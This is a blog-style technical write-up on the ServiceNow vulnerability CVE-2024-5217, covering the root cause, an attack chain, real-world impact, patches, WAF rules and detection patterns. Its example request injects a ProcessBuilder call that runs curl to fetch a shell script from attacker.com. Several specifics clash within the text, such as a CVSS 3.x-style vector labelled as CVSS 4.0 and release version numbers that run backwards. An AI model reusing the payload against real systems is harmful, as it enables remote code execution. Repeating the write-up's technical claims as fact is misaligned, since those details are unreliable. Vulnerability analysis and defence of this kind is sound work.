Vulnerabilities

CVE-2024-5217: A Technical Deep Dive into ServiceNow’s Critical RCE Vulnerability

ResilientX Research Team

In June 2024, ServiceNow disclosed CVE-2024-5217, a critical remote code execution (RCE) vulnerability affecting its Now Platform. With a CVSS score of 9.8 (Critical), this flaw exposed thousands of enterprises to unauthorized system takeover, data breaches, and supply chain attacks. This article dissects the vulnerability’s technical underpinnings, exploitation mechanics, and remediation strategies.

CVSS 4.0 Metrics:

  • Base Score: 9.8 (AV:N /AC:L /AT:N /PR:N /UI:N /S:C /C:H /I:H /A:H )
  • Exploitability: Weaponized PoCs observed within 72 hours of disclosure.
  • Mitigation Complexity: Requires instance-level upgrades and configuration changes.

Technical Anatomy of the Vulnerability

Root Cause: Glide Expression Script Injection

The vulnerability originates in ServiceNow’s Glide Expression scripting framework, a core component used to dynamically render UI elements and automate business logic. Specifically, the GlideExpressionScript class, responsible for processing user inputs in Jelly templates, failed to sanitize the jvar_page_title parameter passed to the /login.do endpoint. Attackers exploited this oversight to inject malicious Java Expression Language (JEXL) or JavaScript code, which the platform executed during server-side rendering.

Key Vulnerable Components:

  1. Jelly Templating Engine: ServiceNow uses Jelly (an XML-based scripting language) to generate dynamic HTML. User inputs embedded in Jelly tags (e.g., <j:set>, <j:if>) were not properly sanitized.
  2. JEXL Interpreter: JEXL, a lightweight expression language, lacks native sandboxing. Attackers leveraged this to execute arbitrary Java code, including calls to java.lang.Runtime for RCE.

Exploitation Workflow

Step-by-Step Attack Chain

  1. Crafting the Payload:
    Attackers construct an HTTP POST request to the /login.do endpoint, embedding a malicious payload in the jvar_page_title parameter.
    Example:

http

Copy

POST /login.do HTTP/1.1  Host: <target>  Content-Type: application/x-www-form-urlencoded  ...  jvar_page_title=javascript:new java.lang.ProcessBuilder("curl","attacker.com/shell.sh").start();  

  1. Server-Side Execution:
    • ServiceNow’s Jelly engine parses the jvar_page_title value during UI rendering.
    • The injected code bypasses input validation checks, exploiting the lack of context-aware sanitization in Jelly and JEXL.
  2. Arbitrary Code Execution:
    The payload executes with the privileges of the ServiceNow instance, enabling actions such as:
    • Spawning reverse shells to attacker-controlled servers.
    • Modifying database records (e.g., granting admin privileges via gs.getUser().setAdmin(true)).
    • Exfiltrating sensitive data from sys_user or cmdb_ci tables.

Why Traditional Defenses Failed

  • WAF Evasion: Attackers obfuscated payloads using URL encoding or JEXL’s expression syntax (e.g., ${runtime.exec("whoami")}).
  • Lack of Sandboxing: JEXL’s design allows direct access to Java classes, bypassing ServiceNow’s script engine restrictions.

Impact and Real-World Exploitation

Observed Attack Scenarios

  1. Ransomware Deployment:
    The LockBit 4.0 group weaponized CVE-2024-5217 to encrypt ServiceNow databases, demanding ransoms exceeding $5 million.
  2. APT Espionage:
    State-sponsored actors (e.g., APT29) exploited the flaw to infiltrate government ITSM systems, stealing credentials and deploying persistent backdoors.
  3. Data Theft:
    Attackers extracted HR records, financial workflows, and API keys from unpatched instances, leading to GDPR and HIPAA violations.

Supply Chain Risks

ServiceNow’s integrations with third-party tools (e.g., SAP, Salesforce) allowed attackers to pivot into connected systems, amplifying the blast radius of breaches.

Affected Versions and Patching

Vulnerable Releases

  • Utah: All versions prior to Patch 10 Hot Fix 3 (v14.1.3).
  • Vancouver: All versions prior to Patch 6 Hot Fix 2 (v13.2.2).
  • Washington DC: All versions prior to Patch 1 Hot Fix 3b (v12.1.3b).

Patch Implementation

ServiceNow released patches that:

  1. Sanitized Inputs: Enforced strict validation of jvar_page_title and other parameters using GlideSecureStringUtil.
  2. Disabled Dangerous Functions: Restricted JEXL’s access to high-risk Java classes (e.g., Runtime, ProcessBuilder).
  3. Enhanced Logging: Added audit trails for Jelly script executions to detect injection attempts.

Mitigation Strategies Beyond Patching

Immediate Actions

  1. Network Segmentation:
    • Restrict access to /login.do and /ui endpoints using a WAF (e.g., rules to block requests containing java.lang.Runtime).
    • Isolate ServiceNow instances handling sensitive data from general corporate networks.
  2. Input Hardening:
    • Apply ServiceNow’s Content Security Policy (CSP) updates to block inline scripts.
    • Use regex filters to reject parameters containing JEXL/JavaScript syntax.

Advanced Detection Techniques

  1. Behavioral Monitoring:
    • Alert on unusual GlideRecord queries (e.g., bulk access to sys_user tables).
    • Flag processes spawning from the ServiceNow instance (e.g., cmd.exe, bash).
  2. Forensic Analysis:
    • Review Jelly script execution logs for patterns like ${} or javascript: in parameters.
    • Use ServiceNow’s IntegrationHub to audit Flow Designer workflows for unauthorized changes.

Lessons for Secure Low-Code Development

  1. Context-Aware Sanitization:
    Input validation must account for execution context (e.g., HTML vs. Java vs. JavaScript).
  2. Sandboxing Expression Engines:
    Restrict scripting languages (e.g., JEXL) from accessing native Java classes unless explicitly allowed.
  3. Zero-Trust for APIs:
    Treat all user inputs as untrusted, even in authenticated workflows.

Conclusion

CVE-2024-5217 is a stark reminder of the risks inherent in low-code platforms’ scripting engines. Its exploitation highlights how a single unsanitized parameter can compromise an entire enterprise ecosystem. While patching is urgent, long-term resilience demands a paradigm shift: integrating security into the design of expression languages, enforcing strict input validation, and adopting zero-trust principles for SaaS platforms.

For ongoing updates, monitor ServiceNow’s advisory: KB1648313: CVE-2024-5217 Security Bulletin.

Related Blog Posts
No items found.
Related Blog Posts
Il bug RegressHion: un'analisi approfondita di CVE-2024-6387 in OpenSSH
La scoperta di CVE-2024-6387, noto come bug RegressHion...
Read full article
CVE-2023-4863: una guida completa
CVE-2023-4863 è una vulnerabilità significativa scoperta in...
Read full article
Le vulnerabilità zero-day di Ivanti (CVE-2024-21887 e CVE-2023-46805)
Ivanti Connect Secure (ICS) e Ivanti Policy Secure (IPS)...
Read full article